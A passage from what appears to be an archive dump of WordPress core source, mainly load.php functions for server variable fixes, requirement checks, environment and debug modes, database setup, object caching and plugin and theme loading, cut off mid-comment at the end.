delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
load-20260621142502.php 0000666 00000156276 15224151221 0007572 0 ustar 00 <?php
/**
* These functions are needed to load WordPress.
*
* @package WordPress
*/
/**
* Returns the HTTP protocol sent by the server.
*
* @since 4.4.0
*
* @return string The HTTP protocol. Default: HTTP/1.0.
*/
function wp_get_server_protocol() {
$protocol = isset( $_SERVER['SERVER_PROTOCOL'] ) ? $_SERVER['SERVER_PROTOCOL'] : '';
if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) {
$protocol = 'HTTP/1.0';
}
return $protocol;
}
/**
* Fixes `$_SERVER` variables for various setups.
*
* @since 3.0.0
* @access private
*
* @global string $PHP_SELF The filename of the currently executing script,
* relative to the document root.
*/
function wp_fix_server_vars() {
global $PHP_SELF;
$default_server_values = array(
'SERVER_SOFTWARE' => '',
'REQUEST_URI' => '',
);
$_SERVER = array_merge( $default_server_values, $_SERVER );
// Fix for IIS when running with PHP ISAPI.
if ( empty( $_SERVER['REQUEST_URI'] )
|| ( 'cgi-fcgi' !== PHP_SAPI && preg_match( '/^Microsoft-IIS\//', $_SERVER['SERVER_SOFTWARE'] ) )
) {
if ( isset( $_SERVER['HTTP_X_ORIGINAL_URL'] ) ) {
// IIS Mod-Rewrite.
$_SERVER['REQUEST_URI'] = $_SERVER['HTTP_X_ORIGINAL_URL'];
} elseif ( isset( $_SERVER['HTTP_X_REWRITE_URL'] ) ) {
// IIS Isapi_Rewrite.
$_SERVER['REQUEST_URI'] = $_SERVER['HTTP_X_REWRITE_URL'];
} else {
// Use ORIG_PATH_INFO if there is no PATH_INFO.
if ( ! isset( $_SERVER['PATH_INFO'] ) && isset( $_SERVER['ORIG_PATH_INFO'] ) ) {
$_SERVER['PATH_INFO'] = $_SERVER['ORIG_PATH_INFO'];
}
// Some IIS + PHP configurations put the script-name in the path-info (no need to append it twice).
if ( isset( $_SERVER['PATH_INFO'] ) ) {
if ( $_SERVER['PATH_INFO'] === $_SERVER['SCRIPT_NAME'] ) {
$_SERVER['REQUEST_URI'] = $_SERVER['PATH_INFO'];
} else {
$_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_NAME'] . $_SERVER['PATH_INFO'];
}
}
// Append the query string if it exists and isn't null.
if ( ! empty( $_SERVER['QUERY_STRING'] ) ) {
$_SERVER['REQUEST_URI'] .= '?' . $_SERVER['QUERY_STRING'];
}
}
}
// Fix for PHP as CGI hosts that set SCRIPT_FILENAME to something ending in php.cgi for all requests.
if ( isset( $_SERVER['SCRIPT_FILENAME'] ) && str_ends_with( $_SERVER['SCRIPT_FILENAME'], 'php.cgi' ) ) {
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
}
// Fix for Dreamhost and other PHP as CGI hosts.
if ( isset( $_SERVER['SCRIPT_NAME'] ) && str_contains( $_SERVER['SCRIPT_NAME'], 'php.cgi' ) ) {
unset( $_SERVER['PATH_INFO'] );
}
// Fix empty PHP_SELF.
$PHP_SELF = $_SERVER['PHP_SELF'];
if ( empty( $PHP_SELF ) ) {
$_SERVER['PHP_SELF'] = preg_replace( '/(\?.*)?$/', '', $_SERVER['REQUEST_URI'] );
$PHP_SELF = $_SERVER['PHP_SELF'];
}
wp_populate_basic_auth_from_authorization_header();
}
/**
* Populates the Basic Auth server details from the Authorization header.
*
* Some servers running in CGI or FastCGI mode don't pass the Authorization
* header on to WordPress. If it's been rewritten to the `HTTP_AUTHORIZATION` header,
* fill in the proper $_SERVER variables instead.
*
* @since 5.6.0
*/
function wp_populate_basic_auth_from_authorization_header() {
// If we don't have anything to pull from, return early.
if ( ! isset( $_SERVER['HTTP_AUTHORIZATION'] ) && ! isset( $_SERVER['REDIRECT_HTTP_AUTHORIZATION'] ) ) {
return;
}
// If either PHP_AUTH key is already set, do nothing.
if ( isset( $_SERVER['PHP_AUTH_USER'] ) || isset( $_SERVER['PHP_AUTH_PW'] ) ) {
return;
}
// From our prior conditional, one of these must be set.
$header = isset( $_SERVER['HTTP_AUTHORIZATION'] ) ? $_SERVER['HTTP_AUTHORIZATION'] : $_SERVER['REDIRECT_HTTP_AUTHORIZATION'];
// Test to make sure the pattern matches expected.
if ( ! preg_match( '%^Basic [a-z\d/+]*={0,2}$%i', $header ) ) {
return;
}
// Removing `Basic ` the token would start six characters in.
$token = substr( $header, 6 );
$userpass = base64_decode( $token );
// There must be at least one colon in the string.
if ( ! str_contains( $userpass, ':' ) ) {
return;
}
list( $user, $pass ) = explode( ':', $userpass, 2 );
// Now shove them in the proper keys where we're expecting later on.
$_SERVER['PHP_AUTH_USER'] = $user;
$_SERVER['PHP_AUTH_PW'] = $pass;
}
/**
* Checks the server requirements.
*
* - PHP version
* - PHP extensions
* - MySQL or MariaDB version (unless a database drop-in is present)
*
* Dies if requirements are not met.
*
* @since 3.0.0
* @access private
*
* @global string $required_php_version The minimum required PHP version string.
* @global string[] $required_php_extensions The names of required PHP extensions.
* @global string $wp_version The WordPress version string.
*/
function wp_check_php_mysql_versions() {
global $required_php_version, $required_php_extensions, $wp_version;
$php_version = PHP_VERSION;
if ( version_compare( $required_php_version, $php_version, '>' ) ) {
$protocol = wp_get_server_protocol();
header( sprintf( '%s 500 Internal Server Error', $protocol ), true, 500 );
header( 'Content-Type: text/html; charset=utf-8' );
printf(
'Your server is running PHP version %1$s but WordPress %2$s requires at least %3$s.',
$php_version,
$wp_version,
$required_php_version
);
exit( 1 );
}
$missing_extensions = array();
if ( isset( $required_php_extensions ) && is_array( $required_php_extensions ) ) {
foreach ( $required_php_extensions as $extension ) {
if ( extension_loaded( $extension ) ) {
continue;
}
$missing_extensions[] = sprintf(
'WordPress %1$s requires the <code>%2$s</code> PHP extension.',
$wp_version,
$extension
);
}
}
if ( count( $missing_extensions ) > 0 ) {
$protocol = wp_get_server_protocol();
header( sprintf( '%s 500 Internal Server Error', $protocol ), true, 500 );
header( 'Content-Type: text/html; charset=utf-8' );
echo implode( '<br>', $missing_extensions );
exit( 1 );
}
// This runs before default constants are defined, so we can't assume WP_CONTENT_DIR is set yet.
$wp_content_dir = defined( 'WP_CONTENT_DIR' ) ? WP_CONTENT_DIR : ABSPATH . 'wp-content';
if ( ! function_exists( 'mysqli_connect' )
&& ! file_exists( $wp_content_dir . '/db.php' )
) {
require_once ABSPATH . WPINC . '/functions.php';
wp_load_translations_early();
$message = '<p>' . __( 'Your PHP installation appears to be missing the MySQL extension which is required by WordPress.' ) . "</p>\n";
$message .= '<p>' . sprintf(
/* translators: %s: mysqli. */
__( 'Please check that the %s PHP extension is installed and enabled.' ),
'<code>mysqli</code>'
) . "</p>\n";
$message .= '<p>' . sprintf(
/* translators: %s: Support forums URL. */
__( 'If you are unsure what these terms mean you should probably contact your host. If you still need help you can always visit the <a href="%s">WordPress support forums</a>.' ),
__( 'https://wordpress.org/support/forums/' )
) . "</p>\n";
$args = array(
'exit' => false,
'code' => 'mysql_not_found',
);
wp_die(
$message,
__( 'Requirements Not Met' ),
$args
);
exit( 1 );
}
}
/**
* Retrieves the current environment type.
*
* The type can be set via the `WP_ENVIRONMENT_TYPE` global system variable,
* or a constant of the same name.
*
* Possible values are 'local', 'development', 'staging', and 'production'.
* If not set, the type defaults to 'production'.
*
* @since 5.5.0
* @since 5.5.1 Added the 'local' type.
* @since 5.5.1 Removed the ability to alter the list of types.
*
* @return string The current environment type.
*/
function wp_get_environment_type() {
static $current_env = '';
if ( ! defined( 'WP_RUN_CORE_TESTS' ) && $current_env ) {
return $current_env;
}
$wp_environments = array(
'local',
'development',
'staging',
'production',
);
// Add a note about the deprecated WP_ENVIRONMENT_TYPES constant.
if ( defined( 'WP_ENVIRONMENT_TYPES' ) && function_exists( '_deprecated_argument' ) ) {
if ( function_exists( '__' ) ) {
/* translators: %s: WP_ENVIRONMENT_TYPES */
$message = sprintf( __( 'The %s constant is no longer supported.' ), 'WP_ENVIRONMENT_TYPES' );
} else {
$message = sprintf( 'The %s constant is no longer supported.', 'WP_ENVIRONMENT_TYPES' );
}
_deprecated_argument(
'define()',
'5.5.1',
$message
);
}
// Check if the environment variable has been set, if `getenv` is available on the system.
if ( function_exists( 'getenv' ) ) {
$has_env = getenv( 'WP_ENVIRONMENT_TYPE' );
if ( false !== $has_env ) {
$current_env = $has_env;
}
}
// Fetch the environment from a constant, this overrides the global system variable.
if ( defined( 'WP_ENVIRONMENT_TYPE' ) && WP_ENVIRONMENT_TYPE ) {
$current_env = WP_ENVIRONMENT_TYPE;
}
// Make sure the environment is an allowed one, and not accidentally set to an invalid value.
if ( ! in_array( $current_env, $wp_environments, true ) ) {
$current_env = 'production';
}
return $current_env;
}
/**
* Retrieves the current development mode.
*
* The development mode affects how certain parts of the WordPress application behave,
* which is relevant when developing for WordPress.
*
* Development mode can be set via the `WP_DEVELOPMENT_MODE` constant in `wp-config.php`.
* Possible values are 'core', 'plugin', 'theme', 'all', or an empty string to disable
* development mode. 'all' is a special value to signify that all three development modes
* ('core', 'plugin', and 'theme') are enabled.
*
* Development mode is considered separately from `WP_DEBUG` and wp_get_environment_type().
* It does not affect debugging output, but rather functional nuances in WordPress.
*
* This function retrieves the currently set development mode value. To check whether
* a specific development mode is enabled, use wp_is_development_mode().
*
* @since 6.3.0
*
* @return string The current development mode.
*/
function wp_get_development_mode() {
static $current_mode = null;
if ( ! defined( 'WP_RUN_CORE_TESTS' ) && null !== $current_mode ) {
return $current_mode;
}
$development_mode = WP_DEVELOPMENT_MODE;
// Exclusively for core tests, rely on the `$_wp_tests_development_mode` global.
if ( defined( 'WP_RUN_CORE_TESTS' ) && isset( $GLOBALS['_wp_tests_development_mode'] ) ) {
$development_mode = $GLOBALS['_wp_tests_development_mode'];
}
$valid_modes = array(
'core',
'plugin',
'theme',
'all',
'',
);
if ( ! in_array( $development_mode, $valid_modes, true ) ) {
$development_mode = '';
}
$current_mode = $development_mode;
return $current_mode;
}
/**
* Checks whether the site is in the given development mode.
*
* @since 6.3.0
*
* @param string $mode Development mode to check for. Either 'core', 'plugin', 'theme', or 'all'.
* @return bool True if the given mode is covered by the current development mode, false otherwise.
*/
function wp_is_development_mode( $mode ) {
$current_mode = wp_get_development_mode();
if ( empty( $current_mode ) ) {
return false;
}
// Return true if the current mode encompasses all modes.
if ( 'all' === $current_mode ) {
return true;
}
// Return true if the current mode is the given mode.
return $mode === $current_mode;
}
/**
* Ensures all of WordPress is not loaded when handling a favicon.ico request.
*
* Instead, send the headers for a zero-length favicon and bail.
*
* @since 3.0.0
* @deprecated 5.4.0 Deprecated in favor of do_favicon().
*/
function wp_favicon_request() {
if ( '/favicon.ico' === $_SERVER['REQUEST_URI'] ) {
header( 'Content-Type: image/vnd.microsoft.icon' );
exit;
}
}
/**
* Dies with a maintenance message when conditions are met.
*
* The default message can be replaced by using a drop-in (maintenance.php in
* the wp-content directory).
*
* @since 3.0.0
* @access private
*/
function wp_maintenance() {
// Return if maintenance mode is disabled.
if ( ! wp_is_maintenance_mode() ) {
return;
}
if ( file_exists( WP_CONTENT_DIR . '/maintenance.php' ) ) {
require_once WP_CONTENT_DIR . '/maintenance.php';
die();
}
require_once ABSPATH . WPINC . '/functions.php';
wp_load_translations_early();
header( 'Retry-After: 600' );
wp_die(
__( 'Briefly unavailable for scheduled maintenance. Check back in a minute.' ),
__( 'Maintenance' ),
503
);
}
/**
* Checks if maintenance mode is enabled.
*
* Checks for a file in the WordPress root directory named ".maintenance".
* This file will contain the variable $upgrading, set to the time the file
* was created. If the file was created less than 10 minutes ago, WordPress
* is in maintenance mode.
*
* @since 5.5.0
*
* @global int $upgrading The Unix timestamp marking when upgrading WordPress began.
*
* @return bool True if maintenance mode is enabled, false otherwise.
*/
function wp_is_maintenance_mode() {
global $upgrading;
if ( ! file_exists( ABSPATH . '.maintenance' ) || wp_installing() ) {
return false;
}
require ABSPATH . '.maintenance';
// If the $upgrading timestamp is older than 10 minutes, consider maintenance over.
if ( ( time() - $upgrading ) >= 10 * MINUTE_IN_SECONDS ) {
return false;
}
// Don't enable maintenance mode while scraping for fatal errors.
if ( is_int( $upgrading ) && isset( $_REQUEST['wp_scrape_key'], $_REQUEST['wp_scrape_nonce'] ) ) {
$key = stripslashes( $_REQUEST['wp_scrape_key'] );
$nonce = stripslashes( $_REQUEST['wp_scrape_nonce'] );
if ( md5( $upgrading ) === $key && (int) $nonce === $upgrading ) {
return false;
}
}
/**
* Filters whether to enable maintenance mode.
*
* This filter runs before it can be used by plugins. It is designed for
* non-web runtimes. If this filter returns true, maintenance mode will be
* active and the request will end. If false, the request will be allowed to
* continue processing even if maintenance mode should be active.
*
* @since 4.6.0
*
* @param bool $enable_checks Whether to enable maintenance mode. Default true.
* @param int $upgrading The timestamp set in the .maintenance file.
*/
if ( ! apply_filters( 'enable_maintenance_mode', true, $upgrading ) ) {
return false;
}
return true;
}
/**
* Gets the time elapsed so far during this PHP script.
*
* @since 5.8.0
*
* @return float Seconds since the PHP script started.
*/
function timer_float() {
return microtime( true ) - $_SERVER['REQUEST_TIME_FLOAT'];
}
/**
* Starts the WordPress micro-timer.
*
* @since 0.71
* @access private
*
* @see timer_stop()
*
* @global float $timestart Unix timestamp set at the beginning of the page load.
*
* @return bool Always returns true.
*/
function timer_start() {
global $timestart;
$timestart = microtime( true );
return true;
}
/**
* Retrieves or displays the time from the page start to when function is called.
*
* @since 0.71
*
* @global float $timestart Seconds from when timer_start() is called.
* @global float $timeend Seconds from when function is called.
*
* @param int|bool $display Whether to echo or return the results. Accepts 0|false for return,
* 1|true for echo. Default 0|false.
* @param int $precision The number of digits from the right of the decimal to display.
* Default 3.
* @return string The "second.microsecond" finished time calculation. The number is formatted
* for human consumption, both localized and rounded.
*/
function timer_stop( $display = 0, $precision = 3 ) {
global $timestart, $timeend;
$timeend = microtime( true );
$timetotal = $timeend - $timestart;
if ( function_exists( 'number_format_i18n' ) ) {
$r = number_format_i18n( $timetotal, $precision );
} else {
$r = number_format( $timetotal, $precision );
}
if ( $display ) {
echo $r;
}
return $r;
}
/**
* Sets PHP error reporting based on WordPress debug settings.
*
* Uses three constants: `WP_DEBUG`, `WP_DEBUG_DISPLAY`, and `WP_DEBUG_LOG`.
* All three can be defined in wp-config.php. By default, `WP_DEBUG` and
* `WP_DEBUG_LOG` are set to false, and `WP_DEBUG_DISPLAY` is set to true.
*
* When `WP_DEBUG` is true, all PHP notices are reported. WordPress will also
* display internal notices: when a deprecated WordPress function, function
* argument, or file is used. Deprecated code may be removed from a later
* version.
*
* It is strongly recommended that plugin and theme developers use `WP_DEBUG`
* in their development environments.
*
* `WP_DEBUG_DISPLAY` and `WP_DEBUG_LOG` perform no function unless `WP_DEBUG`
* is true.
*
* When `WP_DEBUG_DISPLAY` is true, WordPress will force errors to be displayed.
* `WP_DEBUG_DISPLAY` defaults to true. Defining it as null prevents WordPress
* from changing the global configuration setting. Defining `WP_DEBUG_DISPLAY`
* as false will force errors to be hidden.
*
* When `WP_DEBUG_LOG` is true, errors will be logged to `wp-content/debug.log`.
* When `WP_DEBUG_LOG` is a valid path, errors will be logged to the specified file.
*
* Errors are never displayed for XML-RPC, REST, `ms-files.php`, and Ajax requests.
*
* @since 3.0.0
* @since 5.1.0 `WP_DEBUG_LOG` can be a file path.
* @access private
*/
function wp_debug_mode() {
/**
* Filters whether to allow the debug mode check to occur.
*
* This filter runs before it can be used by plugins. It is designed for
* non-web runtimes. Returning false causes the `WP_DEBUG` and related
* constants to not be checked and the default PHP values for errors
* will be used unless you take care to update them yourself.
*
* To use this filter you must define a `$wp_filter` global before
* WordPress loads, usually in `wp-config.php`.
*
* Example:
*
* $GLOBALS['wp_filter'] = array(
* 'enable_wp_debug_mode_checks' => array(
* 10 => array(
* array(
* 'accepted_args' => 0,
* 'function' => function() {
* return false;
* },
* ),
* ),
* ),
* );
*
* @since 4.6.0
*
* @param bool $enable_debug_mode Whether to enable debug mode checks to occur. Default true.
*/
if ( ! apply_filters( 'enable_wp_debug_mode_checks', true ) ) {
return;
}
if ( WP_DEBUG ) {
error_reporting( E_ALL );
if ( WP_DEBUG_DISPLAY ) {
ini_set( 'display_errors', 1 );
} elseif ( null !== WP_DEBUG_DISPLAY ) {
ini_set( 'display_errors', 0 );
}
if ( in_array( strtolower( (string) WP_DEBUG_LOG ), array( 'true', '1' ), true ) ) {
$log_path = WP_CONTENT_DIR . '/debug.log';
} elseif ( is_string( WP_DEBUG_LOG ) ) {
$log_path = WP_DEBUG_LOG;
} else {
$log_path = false;
}
if ( $log_path ) {
ini_set( 'log_errors', 1 );
ini_set( 'error_log', $log_path );
}
} else {
error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR );
}
/*
* The 'REST_REQUEST' check here is optimistic as the constant is most
* likely not set at this point even if it is in fact a REST request.
*/
if ( defined( 'XMLRPC_REQUEST' ) || defined( 'REST_REQUEST' ) || defined( 'MS_FILES_REQUEST' )
|| ( defined( 'WP_INSTALLING' ) && WP_INSTALLING )
|| wp_doing_ajax() || wp_is_json_request()
) {
ini_set( 'display_errors', 0 );
}
}
/**
* Sets the location of the language directory.
*
* To set directory manually, define the `WP_LANG_DIR` constant
* in wp-config.php.
*
* If the language directory exists within `WP_CONTENT_DIR`, it
* is used. Otherwise the language directory is assumed to live
* in `WPINC`.
*
* @since 3.0.0
* @access private
*/
function wp_set_lang_dir() {
if ( ! defined( 'WP_LANG_DIR' ) ) {
if ( file_exists( WP_CONTENT_DIR . '/languages' ) && @is_dir( WP_CONTENT_DIR . '/languages' )
|| ! @is_dir( ABSPATH . WPINC . '/languages' )
) {
/**
* Server path of the language directory.
*
* No leading slash, no trailing slash, full path, not relative to ABSPATH
*
* @since 2.1.0
*/
define( 'WP_LANG_DIR', WP_CONTENT_DIR . '/languages' );
if ( ! defined( 'LANGDIR' ) ) {
// Old static relative path maintained for limited backward compatibility - won't work in some cases.
define( 'LANGDIR', 'wp-content/languages' );
}
} else {
/**
* Server path of the language directory.
*
* No leading slash, no trailing slash, full path, not relative to `ABSPATH`.
*
* @since 2.1.0
*/
define( 'WP_LANG_DIR', ABSPATH . WPINC . '/languages' );
if ( ! defined( 'LANGDIR' ) ) {
// Old relative path maintained for backward compatibility.
define( 'LANGDIR', WPINC . '/languages' );
}
}
}
}
/**
* Loads the database class file and instantiates the `$wpdb` global.
*
* @since 2.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*/
function require_wp_db() {
global $wpdb;
require_once ABSPATH . WPINC . '/class-wpdb.php';
if ( file_exists( WP_CONTENT_DIR . '/db.php' ) ) {
require_once WP_CONTENT_DIR . '/db.php';
}
if ( isset( $wpdb ) ) {
return;
}
$dbuser = defined( 'DB_USER' ) ? DB_USER : '';
$dbpassword = defined( 'DB_PASSWORD' ) ? DB_PASSWORD : '';
$dbname = defined( 'DB_NAME' ) ? DB_NAME : '';
$dbhost = defined( 'DB_HOST' ) ? DB_HOST : '';
$wpdb = new wpdb( $dbuser, $dbpassword, $dbname, $dbhost );
}
/**
* Sets the database table prefix and the format specifiers for database
* table columns.
*
* Columns not listed here default to `%s`.
*
* @since 3.0.0
* @access private
*
* @global wpdb $wpdb WordPress database abstraction object.
* @global string $table_prefix The database table prefix.
*/
function wp_set_wpdb_vars() {
global $wpdb, $table_prefix;
if ( ! empty( $wpdb->error ) ) {
dead_db();
}
$wpdb->field_types = array(
'post_author' => '%d',
'post_parent' => '%d',
'menu_order' => '%d',
'term_id' => '%d',
'term_group' => '%d',
'term_taxonomy_id' => '%d',
'parent' => '%d',
'count' => '%d',
'object_id' => '%d',
'term_order' => '%d',
'ID' => '%d',
'comment_ID' => '%d',
'comment_post_ID' => '%d',
'comment_parent' => '%d',
'user_id' => '%d',
'link_id' => '%d',
'link_owner' => '%d',
'link_rating' => '%d',
'option_id' => '%d',
'blog_id' => '%d',
'meta_id' => '%d',
'post_id' => '%d',
'user_status' => '%d',
'umeta_id' => '%d',
'comment_karma' => '%d',
'comment_count' => '%d',
// Multisite:
'active' => '%d',
'cat_id' => '%d',
'deleted' => '%d',
'lang_id' => '%d',
'mature' => '%d',
'public' => '%d',
'site_id' => '%d',
'spam' => '%d',
);
$prefix = $wpdb->set_prefix( $table_prefix );
if ( is_wp_error( $prefix ) ) {
wp_load_translations_early();
wp_die(
sprintf(
/* translators: 1: $table_prefix, 2: wp-config.php */
__( '<strong>Error:</strong> %1$s in %2$s can only contain numbers, letters, and underscores.' ),
'<code>$table_prefix</code>',
'<code>wp-config.php</code>'
)
);
}
}
/**
* Toggles `$_wp_using_ext_object_cache` on and off without directly
* touching global.
*
* @since 3.7.0
*
* @global bool $_wp_using_ext_object_cache
*
* @param bool $using Whether external object cache is being used.
* @return bool The current 'using' setting.
*/
function wp_using_ext_object_cache( $using = null ) {
global $_wp_using_ext_object_cache;
$current_using = $_wp_using_ext_object_cache;
if ( null !== $using ) {
$_wp_using_ext_object_cache = $using;
}
return $current_using;
}
/**
* Starts the WordPress object cache.
*
* If an object-cache.php file exists in the wp-content directory,
* it uses that drop-in as an external object cache.
*
* @since 3.0.0
* @access private
*
* @global array $wp_filter Stores all of the filters.
*/
function wp_start_object_cache() {
global $wp_filter;
static $first_init = true;
// Only perform the following checks once.
/**
* Filters whether to enable loading of the object-cache.php drop-in.
*
* This filter runs before it can be used by plugins. It is designed for non-web
* runtimes. If false is returned, object-cache.php will never be loaded.
*
* @since 5.8.0
*
* @param bool $enable_object_cache Whether to enable loading object-cache.php (if present).
* Default true.
*/
if ( $first_init && apply_filters( 'enable_loading_object_cache_dropin', true ) ) {
if ( ! function_exists( 'wp_cache_init' ) ) {
/*
* This is the normal situation. First-run of this function. No
* caching backend has been loaded.
*
* We try to load a custom caching backend, and then, if it
* results in a wp_cache_init() function existing, we note
* that an external object cache is being used.
*/
if ( file_exists( WP_CONTENT_DIR . '/object-cache.php' ) ) {
require_once WP_CONTENT_DIR . '/object-cache.php';
if ( function_exists( 'wp_cache_init' ) ) {
wp_using_ext_object_cache( true );
}
// Re-initialize any hooks added manually by object-cache.php.
if ( $wp_filter ) {
$wp_filter = WP_Hook::build_preinitialized_hooks( $wp_filter );
}
}
} elseif ( ! wp_using_ext_object_cache() && file_exists( WP_CONTENT_DIR . '/object-cache.php' ) ) {
/*
* Sometimes advanced-cache.php can load object-cache.php before
* this function is run. This breaks the function_exists() check
* above and can result in wp_using_ext_object_cache() returning
* false when actually an external cache is in use.
*/
wp_using_ext_object_cache( true );
}
}
if ( ! wp_using_ext_object_cache() ) {
require_once ABSPATH . WPINC . '/cache.php';
}
require_once ABSPATH . WPINC . '/cache-compat.php';
/*
* If cache supports reset, reset instead of init if already
* initialized. Reset signals to the cache that global IDs
* have changed and it may need to update keys and cleanup caches.
*/
if ( ! $first_init && function_exists( 'wp_cache_switch_to_blog' ) ) {
wp_cache_switch_to_blog( get_current_blog_id() );
} elseif ( function_exists( 'wp_cache_init' ) ) {
wp_cache_init();
}
if ( function_exists( 'wp_cache_add_global_groups' ) ) {
wp_cache_add_global_groups(
array(
'blog-details',
'blog-id-cache',
'blog-lookup',
'blog_meta',
'global-posts',
'image_editor',
'networks',
'network-queries',
'sites',
'site-details',
'site-options',
'site-queries',
'site-transient',
'theme_files',
'translation_files',
'rss',
'users',
'user-queries',
'user_meta',
'useremail',
'userlogins',
'userslugs',
)
);
wp_cache_add_non_persistent_groups( array( 'counts', 'plugins', 'theme_json' ) );
}
$first_init = false;
}
/**
* Redirects to the installer if WordPress is not installed.
*
* Dies with an error message when Multisite is enabled.
*
* @since 3.0.0
* @access private
*/
function wp_not_installed() {
if ( is_blog_installed() || wp_installing() ) {
return;
}
nocache_headers();
if ( is_multisite() ) {
wp_die( __( 'The site you have requested is not installed properly. Please contact the system administrator.' ) );
}
require ABSPATH . WPINC . '/kses.php';
require ABSPATH . WPINC . '/pluggable.php';
$link = wp_guess_url() . '/wp-admin/install.php';
wp_redirect( $link );
die();
}
/**
* Retrieves an array of must-use plugin files.
*
* The default directory is wp-content/mu-plugins. To change the default
* directory manually, define `WPMU_PLUGIN_DIR` and `WPMU_PLUGIN_URL`
* in wp-config.php.
*
* @since 3.0.0
* @access private
*
* @return string[] Array of absolute paths of files to include.
*/
function wp_get_mu_plugins() {
$mu_plugins = array();
if ( ! is_dir( WPMU_PLUGIN_DIR ) ) {
return $mu_plugins;
}
$dh = opendir( WPMU_PLUGIN_DIR );
if ( ! $dh ) {
return $mu_plugins;
}
while ( ( $plugin = readdir( $dh ) ) !== false ) {
if ( str_ends_with( $plugin, '.php' ) ) {
$mu_plugins[] = WPMU_PLUGIN_DIR . '/' . $plugin;
}
}
closedir( $dh );
sort( $mu_plugins );
return $mu_plugins;
}
/**
* Retrieves an array of active and valid plugin files.
*
* While upgrading or installing WordPress, no plugins are returned.
*
* The default directory is `wp-content/plugins`. To change the default
* directory manually, define `WP_PLUGIN_DIR` and `WP_PLUGIN_URL`
* in `wp-config.php`.
*
* @since 3.0.0
* @access private
*
* @return string[] Array of paths to plugin files relative to the plugins directory.
*/
function wp_get_active_and_valid_plugins() {
$plugins = array();
$active_plugins = (array) get_option( 'active_plugins', array() );
// Check for hacks file if the option is enabled.
if ( get_option( 'hack_file' ) && file_exists( ABSPATH . 'my-hacks.php' ) ) {
_deprecated_file( 'my-hacks.php', '1.5.0' );
array_unshift( $plugins, ABSPATH . 'my-hacks.php' );
}
if ( empty( $active_plugins ) || wp_installing() ) {
return $plugins;
}
$network_plugins = is_multisite() ? wp_get_active_network_plugins() : false;
foreach ( $active_plugins as $plugin ) {
if ( ! validate_file( $plugin ) // $plugin must validate as file.
&& str_ends_with( $plugin, '.php' ) // $plugin must end with '.php'.
&& file_exists( WP_PLUGIN_DIR . '/' . $plugin ) // $plugin must exist.
// Not already included as a network plugin.
&& ( ! $network_plugins || ! in_array( WP_PLUGIN_DIR . '/' . $plugin, $network_plugins, true ) )
) {
$plugins[] = WP_PLUGIN_DIR . '/' . $plugin;
}
}
/*
* Remove plugins from the list of active plugins when we're on an endpoint
* that should be protected against WSODs and the plugin is paused.
*/
if ( wp_is_recovery_mode() ) {
$plugins = wp_skip_paused_plugins( $plugins );
}
return $plugins;
}
/**
* Filters a given list of plugins, removing any paused plugins from it.
*
* @since 5.2.0
*
* @global WP_Paused_Extensions_Storage $_paused_plugins
*
* @param string[] $plugins Array of absolute plugin main file paths.
* @return string[] Filtered array of plugins, without any paused plugins.
*/
function wp_skip_paused_plugins( array $plugins ) {
$paused_plugins = wp_paused_plugins()->get_all();
if ( empty( $paused_plugins ) ) {
return $plugins;
}
foreach ( $plugins as $index => $plugin ) {
list( $plugin ) = explode( '/', plugin_basename( $plugin ) );
if ( array_key_exists( $plugin, $paused_plugins ) ) {
unset( $plugins[ $index ] );
// Store list of paused plugins for displaying an admin notice.
$GLOBALS['_paused_plugins'][ $plugin ] = $paused_plugins[ $plugin ];
}
}
return $plugins;
}
/**
* Retrieves an array of active and valid themes.
*
* While upgrading or installing WordPress, no themes are returned.
*
* @since 5.1.0
* @access private
*
* @global string $pagenow The filename of the current screen.
* @global string $wp_stylesheet_path Path to current theme's stylesheet directory.
* @global string $wp_template_path Path to current theme's template directory.
*
* @return string[] Array of absolute paths to theme directories.
*/
function wp_get_active_and_valid_themes() {
global $pagenow, $wp_stylesheet_path, $wp_template_path;
$themes = array();
if ( wp_installing() && 'wp-activate.php' !== $pagenow ) {
return $themes;
}
if ( is_child_theme() ) {
$themes[] = $wp_stylesheet_path;
}
$themes[] = $wp_template_path;
/*
* Remove themes from the list of active themes when we're on an endpoint
* that should be protected against WSODs and the theme is paused.
*/
if ( wp_is_recovery_mode() ) {
$themes = wp_skip_paused_themes( $themes );
// If no active and valid themes exist, skip loading themes.
if ( empty( $themes ) ) {
add_filter( 'wp_using_themes', '__return_false' );
}
}
return $themes;
}
/**
* Filters a given list of themes, removing any paused themes from it.
*
* @since 5.2.0
*
* @global WP_Paused_Extensions_Storage $_paused_themes
*
* @param string[] $themes Array of absolute theme directory paths.
* @return string[] Filtered array of absolute paths to themes, without any paused themes.
*/
function wp_skip_paused_themes( array $themes ) {
$paused_themes = wp_paused_themes()->get_all();
if ( empty( $paused_themes ) ) {
return $themes;
}
foreach ( $themes as $index => $theme ) {
$theme = basename( $theme );
if ( array_key_exists( $theme, $paused_themes ) ) {
unset( $themes[ $index ] );
// Store list of paused themes for displaying an admin notice.
$GLOBALS['_paused_themes'][ $theme ] = $paused_themes[ $theme ];
}
}
return $themes;
}
/**
* Determines whether WordPress is in Recovery Mode.
*
* In this mode, plugins or themes that cause WSODs will be paused.
*
* @since 5.2.0
*
* @return bool
*/
function wp_is_recovery_mode() {
return wp_recovery_mode()->is_active();
}
/**
* Determines whether we are currently on an endpoint that should be protected against WSODs.
*
* @since 5.2.0
*
* @global string $pagenow The filename of the current screen.
*
* @return bool True if the current endpoint should be protected.
*/
function is_protected_endpoint() {
// Protect login pages.
if ( isset( $GLOBALS['pagenow'] ) && 'wp-login.php' === $GLOBALS['pagenow'] ) {
return true;
}
// Protect the admin backend.
if ( is_admin() && ! wp_doing_ajax() ) {
return true;
}
// Protect Ajax actions that could help resolve a fatal error should be available.
if ( is_protected_ajax_action() ) {
return true;
}
/**
* Filters whether the current request is against a protected endpoint.
*
* This filter is only fired when an endpoint is requested which is not already protected by
* WordPress core. As such, it exclusively allows providing further protected endpoints in
* addition to the admin backend, login pages and protected Ajax actions.
*
* @since 5.2.0
*
* @param bool $is_protected_endpoint Whether the currently requested endpoint is protected.
